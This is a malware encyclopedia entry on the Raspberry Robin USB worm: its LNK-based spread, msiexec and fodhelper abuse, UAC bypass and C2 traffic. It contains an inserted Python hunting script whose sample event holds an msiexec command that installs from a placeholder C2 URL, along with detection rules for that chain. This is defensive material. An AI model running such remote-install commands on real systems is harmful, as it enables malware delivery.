
Raspberry Robin

First posted on 05 July 2022.
Source: SecurityHome

Aliases :

There are no other names known for Raspberry Robin.

Explanation :

The malware, dubbed Raspberry Robin, spreads via infected USB devices, and it was first spotted in September 2021 by Red Canary intelligence analysts.

Cybersecurity firm Sekoia also observed it using QNAP NAS devices as command and control (C2) servers in early November, while Microsoft said it found malicious artifacts linked to this worm created in 2019.

Although Microsoft observed the malware connecting to addresses on the Tor network, the threat actors are yet to exploit the access they gained to their victims' networks.

This is in spite of the fact that they could easily escalate their attacks given that the malware can bypass User Account Control (UAC) on infected systems using legitimate Windows tools.

Raspberry Robin is spreading to new Windows systems via infected USB drives containing a malicious .LNK file.

Once the USB device is attached and the user clicks the link, the worm spawns a msiexec process using cmd.exe to launch a malicious file stored on the infected drive.

It infects new Windows devices, communicates with its command and control servers (C2), and executes malicious payloads using several legitimate Windows utilities:

  • fodhelper (a trusted binary for managing features in Windows settings)
  • msiexec (command-line Windows Installer component)
  • odbcconf (a tool for configuring ODBC drivers)

While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware, Red Canary researchers explained.

Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.
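The process chain described above (cmd.exe spawning msiexec, msiexec reaching out to a remote address, and fodhelper used for the UAC bypass) can be hunted for in process-creation telemetry. The following is an added example, not code from SecurityHome or Red Canary; the event field names, hosts, paths and the domain are constructed placeholders, and the fodhelper child-process rule is an assumed heuristic.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields).
# Hosts, paths and domains are placeholders, not indicators from the page.
EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://c2.example.invalid:8080/abc"},
    {"host": "WS02", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"C:\Windows\System32\msiexec.exe /V"},
    {"host": "WS03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\a\Downloads\setup.msi"'},
    {"host": "WS01", "parent": r"C:\Windows\System32\fodhelper.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe placeholder.dll,Entry"},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the reasons an event matches the behaviour described above."""
    reasons = []
    image, parent = basename(ev["image"]), basename(ev["parent"])
    if image == "msiexec.exe":
        if URL_RE.search(ev["cmdline"]):
            reasons.append("msiexec given a remote URL")
        if parent == "cmd.exe":
            reasons.append("msiexec spawned by cmd.exe")
    # Assumed heuristic: fodhelper.exe does not normally launch child processes.
    if parent == "fodhelper.exe":
        reasons.append("child process of fodhelper.exe")
    return reasons

def triage(events):
    """Return (host, image, reasons) for every event with at least one match."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["host"], basename(ev["image"]), reasons))
    return hits

if __name__ == "__main__":
    for host, image, reasons in triage(EVENTS):
        print(host, image, "; ".join(reasons))
```

Routine installs launched from explorer.exe and the Windows Installer service itself (the WS02 and WS03 events) produce no match, so the rules key on the combination the page describes rather than on msiexec alone.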

Security researchers who spotted Raspberry Robin in the wild are yet to attribute the malware to a threat group and are still working on finding its operators' end goal.

However, Microsoft has tagged this campaign as high-risk, given that the attackers could download and deploy additional malware within the victims' networks and escalate their privileges at any time.

Last update 05 July 2022